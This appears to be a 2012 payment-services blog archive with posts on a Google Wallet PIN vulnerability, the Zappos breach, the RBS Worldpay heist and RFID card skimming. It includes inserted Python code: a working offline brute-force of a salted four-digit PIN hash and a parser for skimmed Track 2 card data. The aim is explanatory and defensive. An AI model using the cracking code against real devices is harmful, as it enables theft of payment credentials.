Monday, February 13th, 2012

App Cracks Your Google Wallet PIN in Seconds

Tags: data security, mobile payments

As regular readers of this blog know very well, we love the concept behind Google Wallet here at UniBul Merchant Services. We believe that every digital wallet, just like its physical counterpart, should allow its users to store in it all types of payment methods they may want, including bank cards issued by different banks and bearing different brand logos. And Google is offering precisely that.


However, data security is even more important than convenience and user-friendliness. In fact, your service should not be made available to consumers until your system can be guaranteed to protect your customers’ personal information. And that apparently is not the case with Google Wallet.

How to Crack Google Wallet in Seconds


The good people at Zvelo have done a lot of work evaluating Google Wallet’s security credentials and have found them wanting. They have built an app that can enable anyone to retrieve your Google Wallet PIN, if they can get their hands on your phone. They have even posted this video to show you how quickly and painlessly this is done:



Now, this Zvelo app may not be made available for download on the Android Market anytime soon, but the bad news is that it is apparently incredibly simple for anyone with a relatively modest amount of technical skills to replicate it. There is a lot of technical jargon in Zvelo’s explanation of the hack, but here is the gist of it:

The lynch-pin, however, was that within the PIN information section was a long integer “salt” and a SHA256 hex encoded string “hash”. Knowing that the PIN can only be a 4-digit numeric value, it dawned on us that a brute-force attack would only require calculating, at most, 10,000 SHA256 hashes. This is trivial even on a platform as limited as a smartphone. Proving this hypothesis took little time.


Google Wallet allows only five invalid PIN entry attempts before locking the user out. With this attack, the PIN can be revealed without even a single invalid attempt. This completely negates all of the security of this mobile phone payment system.


There it is, hacking Google Wallet is “trivial.”
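The attack Zvelo describes, worked through in code. This is an added example written for this post, not Zvelo's app and not Google's code. The page only says the PIN record holds a long integer "salt" and a SHA-256 hex "hash"; how the two are combined is not stated, so the example assumes the digest covers the decimal salt followed by the four ASCII PIN digits (the attack does not depend on that choice, only on the attacker knowing the layout). The sample record is constructed with `make_record`. A PBKDF2 variant is included to make the practitioner's caveat concrete: slowing the hash down only multiplies the search time by a constant.

```python
import hashlib
import hmac
import secrets
import time
from typing import Callable, Dict, Optional

Hasher = Callable[[int, str], str]

PIN_SPACE = 10_000  # four numeric digits: log2(10_000), about 13.3 bits of entropy


def fast_hash(salt: int, pin: str) -> str:
    """Stand-in for the stored verifier: SHA-256 over salt and PIN.

    ASSUMPTION (not stated on the page): the digest covers the decimal salt
    followed by the PIN, both as ASCII. Wallet's real layout may differ; the
    attack only needs the attacker to know whatever the layout is."""
    return hashlib.sha256(f"{salt}{pin}".encode("ascii")).hexdigest()


def slow_hash(salt: int, pin: str, iterations: int = 200) -> str:
    """A deliberately slow verifier (PBKDF2), to show that slowing the hash
    down does not rescue a 10,000-value secret. Iterations are kept tiny so
    the demo runs quickly; a real deployment would use far more."""
    return hashlib.pbkdf2_hmac(
        "sha256", pin.encode("ascii"), str(salt).encode("ascii"), iterations
    ).hex()


def make_record(pin: str, h: Hasher = fast_hash) -> Dict[str, object]:
    """Constructed stand-in for the on-phone PIN record: a random long
    integer salt plus the hex digest, as the page describes."""
    salt = secrets.randbits(63)
    return {"salt": salt, "hash": h(salt, pin)}


def crack_pin(record: Dict[str, object], h: Hasher = fast_hash) -> Optional[str]:
    """Offline search of the whole PIN space against a copied record.

    The app's five-attempt lockout never fires: the attacker recomputes the
    verifier locally instead of asking the app to check a guess."""
    salt, target = int(record["salt"]), str(record["hash"])
    for n in range(PIN_SPACE):
        pin = f"{n:04d}"
        if hmac.compare_digest(h(salt, pin), target):
            return pin
    return None


def worst_case_seconds(h: Hasher, samples: int = 100) -> float:
    """Time one guess and extrapolate to exhausting all 10,000 PINs."""
    salt = 1234567890123  # arbitrary fixed salt for the timing loop
    start = time.perf_counter()
    for _ in range(samples):
        h(salt, "0000")
    per_guess = (time.perf_counter() - start) / samples
    return per_guess * PIN_SPACE


if __name__ == "__main__":
    stolen = make_record("7315")  # constructed: what the attacker copies off the phone
    print("recovered PIN:", crack_pin(stolen))
    print(f"exhaustive search, plain SHA-256: {worst_case_seconds(fast_hash):.3f} s")
    print(f"exhaustive search, PBKDF2 x200:   {worst_case_seconds(slow_hash):.3f} s")
```

Run as-is, it prints the recovered PIN and two extrapolated search times. The second number is the caveat: a slow KDF raises the attacker's cost by a constant factor, and 10,000 guesses times a constant is still seconds or minutes on a phone. A four-digit PIN cannot be protected by hashing alone; the check, together with its attempt counter, has to happen somewhere the person holding the phone cannot copy the verifier out of.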

Who Should Be Responsible for Keeping Your PIN Secure?


The Zvelo guys tell us that they immediately contacted Google, alerting them of the vulnerability they uncovered and the search giant “was extremely responsive to the issue, but ran into several obstacles preventing them from releasing the fixed app.” Then we are walked through the obstacle course, which I will spare you, but the interesting part comes at the end of it.


It turns out that when the Google engineers did find a fix for the vulnerability, they promptly ran into another issue, one for which there was no technical solution. “[W]ith the proper fix in place, the PIN will be nearly impossible to crack,” the Zvelo guys assure us, however, the securing of the user’s PIN may “constitute a “change of agency” responsible for keeping the PIN secure.” So not Google, but the card issuer would be the responsible party.


We don’t yet know whether the banks would agree to this “change of agency” thing, but my guess is that they would accept it. There is no doubt in my mind that eventually the NFC technology that is behind Google Wallet will be every bit as secure as any other payment technology, so the banks’ liability will decrease greatly over time. Moreover, being the party responsible for the security of the users’ data will put the issuers in a much better bargaining position when negotiating the terms of their partnership with Google.

The Takeaway


Google Wallet has been in the news, and on the pages of this blog, for so long now that you may be forgiven for thinking that you may be the only one not using it. Well, you may take comfort in the knowledge that the exact opposite is actually true: there are very few Google Wallet users at present. Moreover, there are only two phones on the market today which support it: Google’s own Nexus S and Galaxy Nexus.


So, if there was ever a good time to be uncovering security shortcomings in the service, it would surely be now. Yet, I don’t think it is too much to expect that hacking the current wallet version would not be a “trivial” exercise. I almost get the sense that Google doesn’t care about, or doesn’t understand, the importance of protecting its customers’ personal information. I can only hope to be proved wrong.


Image credit: Google.

Tuesday, February 7th, 2012

Did Zappos Get a Lucky Break in Its Data Breach?

Tags: data security

We have been greatly impressed by the way Zappos has managed its data breach so far. The retailer did a great job of communicating what happened to the public and of providing clear instructions to its customers on what they needed to do to help get things back to normal. And by all appearances, things did get back to normal five days after the breach was announced.


But it could have been worse, much worse. See, Zappos seems to have been fortunate (or was it well prepared?) that the hackers did not get access to the retailer’s database that stores its customers’ credit card and other payment-related information. In the event, a mere change of the customer passwords was sufficient to cure the problem. If the credit card data were hacked, however, the remedial process would have had to be much more complicated and Zappos’ potential liability – much greater. Let me illustrate what I mean with an example.

How the RBS Worldpay Hackers Stole $9.5 Million in 2008


In November 2008 we saw how quickly a large, well organized criminal network can inflict huge damage using stolen credit card data. Back then a group of criminals hacked their way into the files of RBS Worldpay, the U.S. payment processing subsidiary of the Royal Bank of Scotland. Unlike what took place during the Zappos event, the RBS hackers managed to gain access to the credit and debit card data of 1.5 million cardholders. And they made the best use of it in the short amount of time they knew they had, before the cards were closed.


So once the hackers got their hands on the cardholder information, they immediately distributed the loot to a large network of co-conspirators who encoded the stolen data into counterfeit payment cards. But the hackers’ job was far from finished. While their pals were producing fake cards, the hackers got busy modifying RBS Worldpay’s computer systems, so that they could increase the available funds on the cards (in some cases to as much as $500,000), as well as the limits on the amount that could be withdrawn at ATMs.


Only at this point were the criminals ready to cash in. The counterfeit cards were put to use and, over the course of less than twelve hours, the criminals managed to withdraw $9.5 million from some 2,100 ATMs in 280 cities. While the heist was under way, the hackers, still “logged into” RBS Worldpay’s system, were monitoring the withdrawals in real time and, once the job was done, tried to erase their tracks. The criminals were eventually caught, but the damage they’d done was huge.

U.S. Suffers 30 Data Breaches per Month


Now, the above example is truly extraordinary in its complexity and scale and such well-planned and executed electronic heists are fortunately a rare occurrence. But smaller-scale data breaches happen all the time and at the end of Q1 2010 they were occurring at an average rate of around 30 per month in the U.S. alone. Here is how the occurrences of publicly disclosed data breaches were distributed across the last five years of the previous decade (source):


[Chart: publicly disclosed data breaches per year]


And it turns out that close to a third of all data breaches are caused by insider actions, either malicious or, much more commonly, accidental (source):


[Chart: share of data breaches caused by insider actions, malicious vs. accidental]


As you see, the vast majority of all data breaches are the result of low-tech actions or plain negligence. That doesn’t make them any less damaging, though, which is why the PCI DSS requirements are becoming ever stricter (much to merchants’ annoyance, unfortunately).

The Takeaway


We don’t yet know the full extent of the damage inflicted by the Zappos hackers and it will probably be quite some time before we do, if we do. Yet, what is known even now is that the criminals were unable to access the most valuable part of the retailer customers’ profiles: their payment account information. We can only hope that it wasn’t dumb luck that protected that most sensitive of customer data and I also hope that we will eventually learn if it was.


Image credit: TwentyFifthYear.com.

Learn how to lower your card acceptance cost


Learn how to accept credit and debit cards at the lowest processing costs. The Payment Card Acceptance kit contains a video and an e-book:


  • Video – Card Acceptance Best Practices for Lowest Processing Costs (18 min).
  • E-Book – Payment Card Acceptance Guide (19 pages).


Payment Card Acceptance Kit

Monday, February 6th, 2012

How Criminals Can Steal Your Credit Card without Ever Touching It

Tags: data security

Forbes’ Andy Greenberg has a very nice piece on the vulnerability of contactless bank cards to a new form of skimming, which has traditionally been defined as the illegal copying of the information stored in a payment card’s magnetic stripe. Radio-frequency identification (RFID) technology has made it possible for this information to be wirelessly transmitted between a chip embedded in a card, which contains the account data, and an RFID-equipped card reader. Such readers are becoming “increasingly present” at retailer checkouts, where they allow cardholders to complete a payment by waving their card by, rather than swiping it through, the point-of-sale (POS) terminal.


The problem is, as Greenberg reminds us, that RFID card readers can easily and cheaply find their way into the hands of criminals who can then use them to copy your credit card information, even as the card never leaves your wallet, which is “securely” tucked into the inner pocket of your coat. So what can we do to protect ourselves against such high-tech pickpocketing? Well, it turns out that we have a range of options, including frying the card to kill the chip, but banks seem to have taken even more drastic measures.

How Wireless Credit Card Skimming Works


In his piece Greenberg tells us about a presentation given by Kristin Paget, a data security expert, at a hacker conference, which has provided everyone in attendance with a step-by-step guide to the wireless stealing of credit card data. It is a disturbingly straightforward process, which relies on the use of equipment that can be legitimately purchased for a few hundred dollars on eBay.


In fact, I found a couple of YouTube videos that show you exactly how this is done. It’s really incredible to see how easy it is. Watch this one, for example:



And this one:



The problem is that there doesn’t seem to be a way to make our cards readable only by authorized devices. So what’s there to be done?
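To make concrete what a wireless read actually hands a skimmer, here is an added example written for this post (not Paget's demonstration code and not from the Forbes piece). It parses the Track 2 Equivalent Data a contactless card returns, which follows the same ISO/IEC 7813 layout as the magnetic stripe: PAN, separator, YYMM expiry, service code, discretionary data. The sample string is constructed around the well-known 4111... test PAN, not read from any real card; treating the two-digit year as 20YY is an assumption.

```python
import re
from typing import Dict, Optional

# ISO/IEC 7813 track 2 layout, which is also what an EMV contactless card
# returns as "Track 2 Equivalent Data": PAN, a field separator ('D' in the
# card's hex encoding, '=' on a magnetic stripe), expiry as YYMM, a 3-digit
# service code, then issuer discretionary data and optional 'F' padding.
TRACK2_RE = re.compile(
    r"^(?P<pan>\d{12,19})[D=](?P<exp>\d{4})(?P<svc>\d{3})(?P<disc>\d*)F*$"
)

# First digit of the service code (ISO/IEC 7813): where the card may be used.
INTERCHANGE = {
    "1": "international",
    "2": "international, chip (IC) to be used where possible",
    "5": "national only",
    "6": "national only, chip (IC) to be used where possible",
    "7": "private / issuer-restricted",
}


def luhn_ok(pan: str) -> bool:
    """ISO/IEC 7812 check digit: weeds out misreads before a PAN is trusted."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def parse_track2(data: str) -> Optional[Dict[str, str]]:
    """Split a track 2 string into its fields.

    Returns None if the string is not track 2 data or the PAN fails its
    check digit (a radio read that was cut short, or not a card at all)."""
    m = TRACK2_RE.match(data.strip().upper())
    if not m or not luhn_ok(m["pan"]):
        return None
    exp = m["exp"]
    return {
        "pan": m["pan"],
        "expiry": f"20{exp[:2]}-{exp[2:]}",  # ASSUMPTION: YY means 20YY
        "service_code": m["svc"],
        "interchange": INTERCHANGE.get(m["svc"][0], "unknown"),
        "discretionary": m["disc"],
    }


def mask_pan(pan: str) -> str:
    """PCI DSS display rule: show at most the first six and last four digits."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


if __name__ == "__main__":
    # Constructed sample built on the 4111... test PAN; not real card data.
    sample = "4111111111111111D25121010000000000000F"
    fields = parse_track2(sample)
    print(fields)
    print("what a receipt would show:", mask_pan(fields["pan"]))
```

The parsed fields are the whole of what a stripe-style copy contains: account number, expiry and how the card may be used. Note what is not there: the CVV2 printed on the back of the card and the cardholder's PIN are never part of track data, so the copy lends itself to counterfeit-card swipes rather than to online purchases that ask for the security code. The `mask_pan` helper is the same truncation rule that limits what a receipt reveals, which is why a stored copy of "the last four digits" is a much smaller loss than a copy of the track.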

How to Protect Ourselves against Wireless Skimming


As I mentioned above, one of the options suggested by Greenberg’s security expert as a sure way to neutralize the wireless skimming threat is to fry the vulnerable chip. There is a catch, though. While “[t]hree seconds in the microwave will kill the chip…, [f]ive seconds will set it on fire.”


Recognizing the need for a somewhat less arsonous way of dealing with the issue, Paget has come up with a protective device that would be inserted in your wallet to block the RFID waves. Think of it as the wallet-sized equivalent of the heavy blanket placed on your upper body when your dentist takes an X-ray picture of your teeth.


Yet, whatever the effectiveness of such RFID blocking devices and strategies, there is a much bigger issue at play here. It has to do with the fact that most cardholders have no idea that their cards are readable from a distance. And if you don’t know that, you also don’t know that you have a problem. So is there anything that can be done?

The Takeaway


The bottom line is that contactless skimming is a problem and one that makeshift protective devices alone, or microwave ovens for that matter, cannot solve. Ideally, RFID data transmission would only be possible when the cardholder authorizes it, but that does not seem to be feasible at present. Or at least no one is talking about it.


What I’ve noticed is that at least one big card issuer has resorted to a much more drastic solution to the problem: getting rid of the wireless capability altogether. My two new Chase cards do not display the “Blink” logo, which designates RFID capability, whereas the ones they replaced did feature it. If Chase has done it, I have no doubt that others have too. And I think that this is the right response. If you can’t fully secure a given technology, you shouldn’t be using it.


Image credit: MZB.ru.


Wednesday, January 25th, 2012

The Zappos Data Breach 10 Days On: The Lessons Continue

Tags: data security

We received an incredible amount of feedback on our post last week on the Zappos data breach. The interesting thing about it was that, while most of the readers came from our Facebook page, where all of our new articles are immediately posted, and a decent number of them hit the “Like” button, the vast majority of the responses came from Twitter. As a side note, that is beginning to become a trend now and we’d be interested in hearing what experience you’ve had with reader engagement with blog posts published on your business’ Facebook page and Twitter account.


But let’s move on to the issue at hand. It’s been ten days now since Tony Hsieh, CEO of Zappos.com, the Amazon-owned online shoe and apparel retailer, announced in an email that his company had suffered a data breach. We were so impressed by Zappos’ response that we analyzed in detail Hsieh’s email in our initial post and suggested that everyone who may ever have to deal with a similar crisis should use it as a template. But how has the company done since then and more importantly, how have Zappos’ customers been affected in the event’s aftermath?


Well, the retailer has again done an outstanding job and deserves the highest marks for its efforts and, as best we can tell, its customers have suffered no lasting damage at all.

What Has Zappos Done since It Announced the Data Breach?


Following the initial email announcing the breach, Zappos has published two updates on the web page that was specially created for the purpose of keeping customers, and the outside world at large, informed on the progress the retailer was making in getting things back to normal. These updates were terse and to the point.


The first one explained the meaning of a technical term – “cryptographically scrambled” – and informed readers that the company was cooperating with the FBI in its investigation, which is following the standard procedure for dealing with the aftermath of a data breach.


The second update announced that Zappos’ phone system was again functioning as normal, after being intentionally turned off following the event, because it would not have been able to handle the expected volume of incoming calls (which was explained in Hsieh’s email).


So, while the investigation is still ongoing, things are now back to normal at Zappos. But what were the consequences for its customers?

What Is the Damage to Zappos’ Customers?


I read somewhere that the attorneys for a Zappos customer are seeking a class-action suit against the retailer, which was more or less to be expected. But how justified are consumers’ worries in this case? Well, to answer that question we’ll need to understand exactly what information has been compromised.


Zappos told its customers that:

[T]here may have been illegal and unauthorized access to some of your customer account information on Zappos.com, including one or more of the following: your name, e-mail address, billing and shipping addresses, phone number, the last four digits of your credit card number (the standard information you find on receipts), and/or your cryptographically scrambled password (but not your actual password).


We were also told that:

THE DATABASE THAT STORES OUR CUSTOMERS’ CRITICAL CREDIT CARD AND OTHER PAYMENT DATA WAS NOT AFFECTED OR ACCESSED.


So the hackers seem to have gained access to some of the information stored in Zappos’ customer profiles. It is unclear whether or not the criminals may have been able to actually access the customers’ accounts, because we don’t know if they could have retrieved the associated passwords. But even if they could have done that, that wouldn’t have been all that big of a gain. They could have attempted to place an order, which, even in the unlikely event that it went through, would’ve been immediately disputed and the cardholder would have been reimbursed for any financial losses. Moreover, any bank card information that may have been stored in a compromised profile would have been unusable, because it only displays the last four digits of the account number.


In the end, given that the data breach was immediately discovered and the passwords reset, the criminals would have been left with information that, for the most part, is freely available in the Yellow Pages.

The Takeaway


The significance of the Zappos data breach should not be minimized and I’m not attempting to do so. Such events are potentially hugely damaging both for the affected business and its customers, so every effort should be made to prevent them from occurring. If a business is found to have not complied with existing data security standards or to have otherwise been lax in safeguarding sensitive customer information, it should be held accountable for its carelessness. We don’t yet know whether Zappos is guilty on any of these counts, so, though I reserve the right to comment on that issue when information becomes available, I can’t do so at present.


However, the fact remains that Zappos’ response to the crisis has been exceptional and the company deserves to be commended for it. But the real good news is that Zappos’ customers have suffered no lasting damage.


Image credit: REUTERS/Zappos.com/Handout.


Tuesday, January 17th, 2012

Zappos Is Giving Us a Lesson on Managing a Data Breach

Tags: data security

We’ve written about the mechanics of dealing with data breaches on this blog several times before, but Zappos, the Amazon-owned online shoe and apparel retailer, is giving us a great real-time lesson on the subject that everyone who may ever have to deal with the issue should look to for guidance. There is a lot to be learned.


Zappos has built its reputation around, and owes its huge success to, providing an exceptionally high level of customer service, including a 365-day no-questions-asked return policy. Zappos customers, this blogger very much included, really feel that their satisfaction is the retailer’s top priority, and nothing tests the validity of this belief like a confirmed breach of sensitive customer account data. But as I said, Zappos is meeting the challenge with flying colors.

Crisis Management Lessons from the Zappos Data Breach


Zappos announced the data breach in an email from founder and CEO Tony Hsieh to all of the company’s employees that was also published on the retailer’s blog for the whole world to see. This email deserves close examination, as it should be used as a crisis management template by everyone who finds his company in a similar predicament. Let’s do it.


Lesson 1: get everyone involved. By addressing all of his employees, Hsieh makes it clear, both to his own organization’s staff and to the outside world, that this is an issue everyone within his company is responsible for helping to deal with.


Hsieh begins his email thus:

Please set aside 20 minutes to carefully read this entire email.


Lesson 2: make the gravity of the situation immediately clear. It is a short email that takes a few minutes of careful reading to get through, but Hsieh is asking that employees spend much more time on it. Why? Because the issue is critical and he wants everyone to understand that and give it some thought.


Then the CEO tells us what took place:

We were recently the victim of a cyber attack by a criminal who gained access to parts of our internal network and systems through one of our servers in Kentucky. We are cooperating with law enforcement to undergo an exhaustive investigation.


Lesson 3: get straight to the point and tell it like it is. Once you’ve got everyone’s attention and made it clear how important the issue at hand is, the only sensible way to proceed is to describe the matter clearly and concisely. Hsieh does just that.


Now Hsieh tells us that he is not allowed to provide specific details, but adds this:

…THE DATABASE THAT STORES OUR CUSTOMERS’ CRITICAL CREDIT CARD AND OTHER PAYMENT DATA WAS NOT AFFECTED OR ACCESSED.


Lesson 4: don’t overblow the positive aspects (if any). The problem is huge and you’ve already made that point clear. Now, if there is anything that is positive about the story, tell the facts, but don’t make it sound as if it is equally, never mind more, important than the bad news. Doing so would weaken the message of urgency you are sending. That’s also why in his letter to Zappos’ customers that follows the one to his employees, Hsieh refers to this aspect of the story as “the better news,” not a good or positive one.


Hsieh finishes his email in this way:

The most important focus for us right now is the safety and security of our customers’ information. Within the next hour, we will begin the process of notifying the 24+ million customer accounts in our database about the incident and help step them through the process of choosing a new password for their accounts. (We’ve already reset and expired their existing passwords.)


Lesson 5: reiterate your commitment to solving your customers’ problem and say what you are doing about it. You need to look at the issue through the eyes of your customers. They don’t care what your company is going through or how much the cleaning up process will cost you. The only things your customers care about are how big the damage is and what you are doing to protect their interests. That’s what you should be telling them and that is precisely what Hsieh has done.


Then Hsieh attaches the email that his company will be sending to its customers, which informs them of the data breach and tells them what the company has already done to remedy the issue. The letter also asks that customers do the following:

PLEASE CREATE A NEW PASSWORD:


We have expired and reset your password so you can create a new password.


Lesson 6: tell your customers what they need to do. As your customers’ accounts are now compromised, new log-in credentials need to be created. Make this process as simple and straightforward as you can and clearly tell your customers what they need to do. Again, Zappos has done just that.


The letter provides a link to a page where Zappos customers can go to for updates and also informs them that:

We have made the hard decision to temporarily turn off our phones and direct customers to contact us by email because our phone systems simply aren’t capable of handling so much volume. (If 5% of our customers call, that would be over 1 million phone calls, most of which would not even make it into our phone system in the first place.)


Lesson 7: if your customers will be inconvenienced in some way, inform them beforehand and explain why. The worst thing you could do, if things started working differently from the way they used to, would be to keep customers in the dark as to the reason. That would be a sure way to provoke a torrent of negative publicity in the form of angry tweets and comments on the news stories covering the event. So if your customers will be seeing changes in the way you communicate with them, tell them what they should be expecting and why (and make sure there is a good reason for it!).

The Takeaway


Bad things do happen and data breaches are certainly no exception. Your customers understand that and will give you the benefit of the doubt, if you do suffer a breach, unless you’ve been egregiously negligent in protecting their information. Your response to the crisis will be the only thing that determines whether the issue is resolved with minimal damage and inconvenience to your customers or it deteriorates into a PR disaster.


Zappos is giving us a lesson on how to do this properly and we should all be taking notes.


Image credit: Resimbul.com.
